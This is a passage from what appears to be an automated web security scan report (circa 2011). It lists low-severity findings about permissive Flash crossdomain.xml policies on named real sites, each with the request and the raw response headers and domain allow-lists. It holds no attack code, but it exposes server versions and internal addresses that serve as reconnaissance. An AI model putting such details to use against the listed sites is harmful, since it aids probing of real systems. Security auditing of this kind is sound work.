<allow-access-from domain="*.grindtv.com" />
<allow-access-from domain="*.vipix.com" />
<allow-access-from domain="*.maven.net" />
<allow-access-from domain="*.mlb.com" />
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.comcast.net" />
<allow-access-from domain="*.comcastonline.com" />
<allow-access-from domain="*.flickr.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.overture.com" />
<allow-access-from domain="*.rivals.com" />
<allow-access-from domain="*.scrippsnewspapers.com" />
<allow-access-from domain="*.vmixcore.com" />
<allow-access-from domain="*.vmix.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.yimg.com" />
...[SNIP]...

7.166. http://www.126.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.126.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.126.com

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 00:56:09 GMT
Server: Apache
Last-Modified: Wed, 03 Dec 2008 08:53:25 GMT
ETag: "304e9d-1aa-93b08b40"
Accept-Ranges: bytes
Content-Length: 426
Cache-Control: max-age=3600
Expires: Mon, 02 May 2011 01:56:09 GMT
Vary: Accept-Encoding
Content-Type: application/xml
X-Cache: HIT from mcache.163.com
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="m
...[SNIP]...
<allow-access-from domain="*.163.com"/>
<allow-access-from domain="*.netease.com"/>
<allow-access-from domain="*.126.com"/>
<allow-access-from domain="*.yeah.net"/>
...[SNIP]...

7.167. http://www.accu-chek.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.accu-chek.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.accu-chek.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:36:59 GMT
Server: IBM_HTTP_Server/6.1.0.23 Apache/2.0.47 (Unix) PHP/5.3.3 mod_jk/1.2.28
Set-cookie: dialogue_id=adc1d6f320110503467d7ebf; path=/; expires=Mon, 10-Nov-19 13:31:32 GMT
Last-Modified: Sat, 13 Jun 2009 04:50:23 GMT
ETag: "34a62e-93-9010e1c0"
Accept-Ranges: bytes
Content-Length: 147
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>

<allow-access-from domain="*.accu-chek.com" secure="true"/>

</cross-domain-policy>

7.168. http://www.actonsoftware.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.actonsoftware.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.actonsoftware.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"596-1300332243000"
Last-Modified: Thu, 17 Mar 2011 03:24:03 GMT
Content-Type: application/xml
Content-Length: 596
Date: Tue, 03 May 2011 10:48:43 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.actonsoftware.com" />
<allow-access-from domain="actonsoftware.com" />
<allow-access-from domain="*.actonsoftware.com" />
<allow-access-from domain="www.act-on.com" />
<allow-access-from domain="act-on.com" />
<allow-access-from domain="*.act-on.com" />
<allow-access-from domain="www.act-on.net" />
<allow-access-from domain="act-on.net" />
<allow-access-from domain="*.act-on.net" />
...[SNIP]...

7.169. http://www.allbran.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.allbran.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.allbran.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:58:52 GMT
Server: Apache
Last-Modified: Wed, 26 Mar 2008 19:12:27 GMT
ETag: "1403b-78a-d983fcc0"
Accept-Ranges: bytes
Content-Length: 1930
P3P: CP="CURi ADMa DEVa OUR IND DSP IDC COR", policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="speed.pointroll.com" />
<allow-access-from domain="data.pointroll.com" />
<allow-access-from domain="media.pointroll.com" />
<allow-access-from domain="mirror.pointroll.com" />
<allow-access-from domain="pointroll.com" />
<allow-access-from domain="www.pointroll.com" />
<allow-access-from domain="mx.pointroll.com" />
<allow-access-from domain="geo.pointroll.com" />
<allow-access-from domain="ll.pointroll.com" />
<allow-access-from domain="clk.pointroll.com" />
<allow-access-from domain="submit.pointroll.com" />
<allow-access-from domain="clients.pointroll.com" />
<allow-access-from domain="fdaf.pointroll.com" />
<allow-access-from domain="demo.pointroll.net" />
<allow-access-from domain="www.applejacks.com" />
<allow-access-from domain="applejacks.com" />
<allow-access-from domain="www.poptarts.com" />
<allow-access-from domain="poptarts.com" />
<allow-access-from domain="www.smartstart.com" />
<allow-access-from domain="smartstart.com" />
<allow-access-from domain="www.bonus.com" />
<allow-access-from domain="bonus.com" />
<allow-access-from domain="www.kaboose.com" />
<allow-access-from domain="kaboose.com" />
...[SNIP]...
<allow-access-from domain="www.cartoonnetwork.com" />
<allow-access-from domain="cartoonnetwork.com" />
<allow-access-from domain="www.nick.com" />
<allow-access-from domain="nick.com" />
<allow-access-from domain="*.yahoo.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.specialk.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="specialk.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.specialk.stagek.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="specialk.stagek.com" secure="false"/>
...[SNIP]...

7.170. http://www.b92.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.b92.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.b92.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:39:30 GMT
Server: Apache/2.2.17 (Unix) DAV/2
Last-Modified: Fri, 30 Apr 2010 13:47:27 GMT
ETag: "4c1715-19e-485747bd379c0"
Accept-Ranges: bytes
Content-Length: 414
Connection: close
Content-Type: application/xml

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="b92s.net" />
<allow-access-from domain="*.b92.net" />
...[SNIP]...

7.171. http://www.bimvid.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bimvid.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bimvid.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:46:19 GMT
Server: VoxCAST
Last-Modified: Wed, 27 Apr 2011 18:08:10 GMT
Vary: Accept-Encoding
X-Server-Name: sj-c14-r8-u22-b9
Content-Length: 7031
Via: 1.0 dv-c1-r1-u7-b4:3128 (squid)
X-Cache: HIT from VoxCAST
Age: 156
Connection: close
Content-Type: text/xml;charset=utf-8

<?xml version="1.0" encoding="UTF-8" ?>
<cross-domain-policy>
<allow-access-from domain="*.bimtv3.bimedia.net"/>
<allow-access-from domain="*.bimtv.bimedia.net"/>
<allow-access-from domain="*.bimedia.net"/>
<allow-access-from domain="*.younewstv.com"/>
<allow-access-from domain="*.broadcast-interactive.com"/>
<allow-access-from domain="*.media.broadcast-interactive.com"/>
<allow-access-from domain="*.bimedia.net"/>
<allow-access-from domain="*alpha.bimedia.net"/>
<allow-access-from domain="*echo.bimedia.net"/>
<allow-access-from domain="*echo2.bimedia.net"/>
<allow-access-from domain="*content.bimedia.net"/>
<allow-access-from domain="*alpha.bimedia.net"/>
<allow-access-from domain="*content.bimedia.net"/>
<allow-access-from domain="*.2news.tv"/>
<allow-access-from domain="*.aksuperstation.com"/>
<allow-access-from domain="*.belo.com"/>
<allow-access-from domain="*.centralillinoisnewscenter.com"/>
<allow-access-from domain="*.cbs3springfield.com"/>
<allow-access-from domain="*.explorepolitics.com"/>
<allow-access-from domain="*.granitetv.com"/>
<allow-access-from domain="*.indianasnewscenter.com"/>
<allow-access-from domain="*.katu.com"/>
<allow-access-from domain="*.kcby.com"/>
<allow-access-from domain="*.kcrg.com"/>
<allow-access-from domain="*.kens5.com"/>
<allow-access-from domain="*.keprtv.com"/>
<allow-access-from domain="*.keyt.com"/>
<allow-access-from domain="*.kfbb.com"/>
<allow-access-from domain="*.kgw.com"/>
<allow-access-from domain="*.khou.com"/>
<allow-access-from domain="*.kidk.com"/>
<allow-access-from domain="*.kimatv.com"/>
<allow-access-from domain="*.king5.com"/>
<allow-access-from domain="*.klewtv.com"/>
<allow-access-from domain="*.kmov.com"/>
<allow-access-from domain="*.knin.com"/>
<allow-access-from domain="*.komonews.com"/>
<allow-access-from domain="*.kpic.com"/>
<allow-access-from domain="*.krem.com"/>
<allow-access-from domain="*.ksee24.com"/>
<allow-access-from domain="*.ksbitv.com"/>
<allow-access-from domain="*.ktnv.com"/>
<allow-access-from domain="*.ktvb.com"/>
<allow-access-from domain="*.clickability.com"/>
<allow-access-from domain="*.kval.com"/>
<allow-access-from domain="*.kvi.com"/>
<allow-access-from domain="*.kvue.com"/>
<allow-access-from domain="*.kulr8.com"/>
<allow-access-from domain="*.northlandsnewscenter.com"/>
<allow-access-from domain="*.nwcn.com"/>
<allow-access-from domain="*.star1015.com"/>
<allow-access-from domain="*.tv20detroit.com"/>
<allow-access-from domain="*.wbng.com"/>
<allow-access-from domain="*.wcnc.com"/>
<allow-access-from domain="*.wdtv.com"/>
<allow-access-from domain="*.whas11.com"/>
<allow-access-from domain="*.wkbw.com"/>
<allow-access-from domain="*.wwltv.com"/>
<allow-access-from domain="*.wltz.com"/>
<allow-access-from domain="*.wnky.net"/>
<allow-access-from domain="*.wfaa.com"/>
<allow-access-from domain="*.wvec.com"/>
<allow-access-from domain="*.abc6.com"/>
<allow-access-from domain="*.wktv.com"/>
<allow-access-from domain="*.wgbctv.com"/>
<allow-access-from domain="*.wmdntv.com"/>
<allow-access-from domain="*.kjzz.com"/>
<allow-access-from domain="*.abcmontana.com"/>
<allow-access-from domain="*.wncftv.com"/>
<allow-access-from domain="*.ugclocal.com"/>
<allow-access-from domain="*.kmvt.com"/>
<allow-access-from domain="*.cnn.com"/>
<allow-access-from domain="*.bakersfieldnow.com"/>
<allow-access-from domain="*.wmdntv.com"/>
<allow-access-from domain="*.wgbctv.com"/>
<allow-access-from domain="*.nbcuxd.com"/>
<allow-access-from domain="*.bakersfieldnow.com"/>
<allow-access-from domain="*.indiancountrytoday.com"/>
<allow-access-from domain="*.indiancountry.com"/>
<allow-access-from domain="*.pro8news.com"/>
<allow-access-from domain="*.oneidaindiannation.com"/>
<allow-access-from domain="*.oneidanation.net"/>
<allow-access-from domain="*.kofytv.com"/>
<allow-access-from domain="*.wrdetv.com"/>
<allow-access-from domain="*.lively-nation.com"/>
<allow-access-from domain="*.ucdailynews.com"/>
<allow-access-from domain="*.wjys.tv"/>
<allow-access-from domain="*.wavenewspapers.com"/>
<allow-access-from domain="*.wwnytv.com"/>
<allow-access-from domain="*.laindependent.com"/>
<allow-access-from domain="*.fox24.com"/>
<allow-access-from domain="*.cachevalleydaily.com"/>
<allow-access-from domain="bim.images.vidavee.com"/>
<allow-access-from domain="*.king5.com"/>
<allow-access-from domain="*.sharinghope.tv"/>
<allow-access-from domain="*.azfamily.com"/>
<allow-access-from domain="*.wpsdlocal6.com"/>
<allow-access-from domain="*.bimvid.com"/>
<allow-access-from domain="*.fox11az.com"/>
<allow-access-from domain="*.kissfmnews.com"/>
<allow-access-from domain="*.mychristiantv.net"/>
<allow-access-from domain="*.cheeseheadtalk.com"/>
<allow-access-from domain="*.myfoxmaine.com"/>
<allow-access-from domain="*.foxcharlotte.com"/>
<allow-access-from domain="*.wfrv.com"/>
<allow-access-from domain="*.wfxb.com"/>
<allow-access-from domain="*.newscentralga.com"/>
<allow-access-from domain="*.worcestermag.com"/>
<allow-access-from domain="*.khastv.com"/>
<allow-access-from domain="*.krextv.com"/>
<allow-access-from domain="*.bimlocal.com"/>
<allow-access-from domain="*.foxillinois.com"/>
<allow-access-from domain="*.thetobagonews.com"/>
<allow-access-from domain="*.trinidadexpress.com"/>
<allow-access-from domain="*.reachcaribbean.com"/>
<allow-access-from domain="*.klassicgrenada.com"/>
<allow-access-from domain="*.sixpointtt.com"/>
<allow-access-from domain="*.trinivoices.com"/>
<allow-access-from domain="*.fox50.com"/>
<allow-access-from domain="*.youralaskalink.com"/>
<allow-access-from domain="*.thehomeforinnovation.com"/>
<allow-access-from domain="*.classicrock102.net"/>
<allow-access-from domain="test.library.contentexchange.titantv.com"/>
<allow-access-from domain="*.titantv.com"/>
<allow-access-from domain="*.decisionmark.com"/>
<allow-access-from domain="*.newstalkkcrs.com"/>
<allow-access-from domain="*.1033kissfm.net"/>
<allow-access-from domain="*.mymix1067.com"/>
<allow-access-from domain="*.mycountry961.com"/>
<allow-access-from domain="*.myironmanstory.com"/>
<allow-access-from domain="*.kcwx.com"/>
<allow-access-from domain="*.ncwtv.com"/>
<allow-access-from domain="*.wktctv.com"/>
<allow-access-from domain="*.krbkhd.com"/>
<allow-access-from domain="*.ktva.com"/>
<allow-access-from domain="*.baystateparent.com"/>
<allow-access-from domain="*.itsyourbiz.com"/>
<allow-access-from domain="*.accuweather.com"/>
<allow-access-from domain="*.kmvt-1.com"/>
<allow-access-from domain="*.wbbjtv.com"/>
<allow-access-from domain="*.abccolumbia.com"/>
<allow-access-from domain="*.ntwinecx.com"/>
<allow-access-from domain="*.ntwineapp.com"/>
<allow-access-from domain="*.sbtv.com"/>
<allow-access-from domain="*.allbusiness.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.hoovers.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dnb.com" secure="false"/>
...[SNIP]...

7.172. http://www.bookmaker.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bookmaker.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bookmaker.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 03 May 2011 11:42:46 GMT
Content-Type: text/xml
Connection: close
Content-Length: 525
Content-Location: http://www.bookmaker.com/crossdomain.xml
Last-Modified: Thu, 03 Mar 2011 21:34:56 GMT
Accept-Ranges: bytes
ETag: "1bb0fdd6ead9cb1:98d"

<cross-domain-policy>
<allow-access-from domain="*.sas.suplitodomedia.com"/>
<allow-access-from domain="*.gaminghouse.com"/>
<allow-access-from domain="*.crfights.com"/>
<allow-access-from domain="*.betcris.com"/>
<allow-access-from domain="10.0.223.185" />
<allow-access-from domain="*.casino.funtimebingo.com" />
<allow-access-from domain="*.2betdsi.com"/>
<allow-access-from domain="*.betdsi.net"/>
<allow-access-from domain="*.contest.bookmaker.com"/>
...[SNIP]...

7.173. http://www.bowtecharchery.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bowtecharchery.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bowtecharchery.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:41:14 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 22 Mar 2011 05:31:57 GMT
ETag: "944000e-3bc-900bed40"
Accept-Ranges: bytes
Content-Length: 956
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.bowtecharchery.com" h
...[SNIP]...
<allow-access-from domain="bowtecharchery.com" headers="*" secure="false" />
...[SNIP]...
<allow-access-from domain="www.diamondarchery.com" headers="*" secure="false" />
...[SNIP]...
<allow-access-from domain="diamondarchery.com" headers="*" secure="false" />
...[SNIP]...
<allow-access-from domain="strykerxbow.com" headers="*" secure="false" />
...[SNIP]...
<allow-access-from domain="www.strykerxbow.com" headers="*" secure="false" />
...[SNIP]...
<allow-access-from domain="fuelthehunt.com" headers="*" secure="false" />
...[SNIP]...
<allow-access-from domain="www.fuelthehunt.com" headers="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.twitter.com"/>
<allow-access-from domain="bowtechmobile:8888"/>
<allow-access-from domain="*.superurchin.com"/>
...[SNIP]...

7.174. http://www.burton.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.burton.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.burton.com

Response

HTTP/1.0 200 OK
Server: Apache
Cache-Control: public;max-age=70570
Expires: Wed, 04 May 2011 06:21:06 GMT
Last-Modified: Thu, 28 Apr 2011 19:35:10 GMT
Content-Type: application/xml
Date: Tue, 03 May 2011 10:44:56 GMT
Content-Length: 471
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.demandware.net" />
<allow-access-from domain="demandware.edgesuite.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="demandware.edgesuite.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.burton.com" />
<allow-access-from domain="host5.chatblazer.com" />
...[SNIP]...

7.175. http://www.bvonstyle.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bvonstyle.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bvonstyle.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:05:43 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 420
Keep-Alive: timeout=5, max=999989
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
<allow-access-from domain="*.aolcdn.com" />
<allow-access-from domain="*.yourminis.com" />
<allow-access-from domain="*.bvnewswire.com" />
...[SNIP]...

7.176. http://www.carnivalmagic.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.carnivalmagic.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.carnivalmagic.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Length: 388
Content-Type: text/xml
Last-Modified: Wed, 22 Dec 2010 19:52:45 GMT
Accept-Ranges: bytes
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:49:40 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.carnivalmagic.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.bgtpartners.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.bitgravity.com" secure="false" />
...[SNIP]...

7.177. http://www.citrix.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.citrix.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.citrix.com

Response

HTTP/1.1 200 OK
Content-Length: 277
Content-Type: text/xml
Last-Modified: Mon, 05 Oct 2009 16:57:34 GMT
Accept-Ranges: bytes
ETag: "01319efdc45ca1:f7f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:16:44 GMT
Connection: keep-alive

<?xml version="1.0"?>

<cross-domain-policy>

<allow-access-from domain="*.edgesuite.net" />

<allow-access-from domain="*.brightcove.com" />

<allow-access-from domain="*.akamai.com" />

<allow-access-from domain="*.citrix.com" />
...[SNIP]...

7.178. http://www.classicwordgames.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.classicwordgames.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.classicwordgames.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:56:35 GMT
Server: Apache
Last-Modified: Wed, 15 Sep 2010 12:38:43 GMT
ETag: "7d954-3bc-4904b9c1dfac0"
Accept-Ranges: bytes
Content-Length: 956
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="apps.facebook.com"/>
<allow-access-from domain="apps.*.facebook.com"/>
<allow-access-from domain="api.facebook.com"/>
<allow-access-from domain="facebook.com"/>
<allow-access-from domain="*.facebook.com"/>
<allow-access-from domain="www.facebook.com"/>
<allow-access-from domain="static.ak.fbcdn.net"/>
<allow-access-from domain="mdc-dev-wc-web01.ubisoft.com"/>
<allow-access-from domain="*.ubisoft.com"/>
<allow-access-from domain="classicwordgames.com"/>
...[SNIP]...
<allow-access-from domain="*.classicwordgames.com"/>
<allow-access-from domain="*.ubi.com"/>
<allow-access-from domain="static11.ubi.com"/>
<allow-access-from domain="static11.cdn.ubi.com"/>
...[SNIP]...

7.179. http://www.clubpogo.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.clubpogo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.clubpogo.com

Response

HTTP/1.1 200 OK
ETag: W/"562-1272402607000"
Last-Modified: Tue, 27 Apr 2010 21:10:07 GMT
Content-Type: text/xml
Content-Length: 562
Date: Tue, 03 May 2011 10:56:06 GMT
Server: Apache-Coyote/1.1
Connection: Keep-Alive

<?xml version="1.0" encoding="ISO-8859-1"?>

<!--
This file is to allow .swfs being served from the ea and double click domains listed below to access XML data (or other services) from the domain th
...[SNIP]...
<allow-access-from domain="*.pogo.com"/>
   <allow-access-from domain="*.pogobeta.com"/>
   <allow-access-from domain="*.ea.com"/>
   <allow-access-from domain="*.easports.com"/>
   <allow-access-from domain="*.pogospike.com"/>
...[SNIP]...

7.180. http://www.ctnow.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ctnow.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ctnow.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8l mod_onsint/1.0
Last-Modified: Tue, 19 Apr 2011 21:26:34 GMT
ETag: "79d729-e7-29941680"
Accept-Ranges: bytes
Content-Length: 231
Content-Type: application/xml
Date: Tue, 03 May 2011 10:40:39 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.brightcove.com" secure="false" />
...[SNIP]...

7.181. http://www.ebay.pl/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ebay.pl
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ebay.pl

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
last-modified: Wed, 27 Oct 2010 13:21:58 GMT
Content-Type: application/xml
Content-Length: 3890
Date: Tue, 03 May 2011 10:51:34 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ebay.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.au" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.at" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.be" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ca" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.com.cn" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.fr" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.de" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.com.hk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.in" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ie" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.it" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.com.my" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.nl" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.nz" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ph" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.pl" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.sg" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.es" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ch" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebayrtm.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebaystatic.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.verve8media.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.westernfreight.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ru" secure="false"/>
...[SNIP]...

7.182. http://www.ellusionist.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ellusionist.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ellusionist.com

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 10:40:29 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
ETag: "155-4bc724f6-0"
Last-Modified: Thu, 15 Apr 2010 14:38:46 GMT
Content-Type: application/xml
Content-Length: 341
Vary: User-Agent
Cache-Control: max-age=31536000
Expires: Wed, 02 May 2012 10:40:29 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*.infusedindustries.com" />
<allow-access-from domain="*.infusedindustries.net" />
...[SNIP]...

7.183. http://www.eluniversal.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.eluniversal.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.eluniversal.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:18:42 GMT
Server: Apache
Last-Modified: Sat, 04 Dec 2010 04:13:32 GMT
ETag: "2021d54-10f-4968de0bed300"
Accept-Ranges: bytes
Content-Length: 271
Cache-Control: max-age=60
Expires: Tue, 03 May 2011 10:19:42 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>

<allow-access-from domain="*.eluniversal.com" />
<allow-access-from domain="*.estampas.com" />
...[SNIP]...

7.184. http://www.facebook.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.53.80.43
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
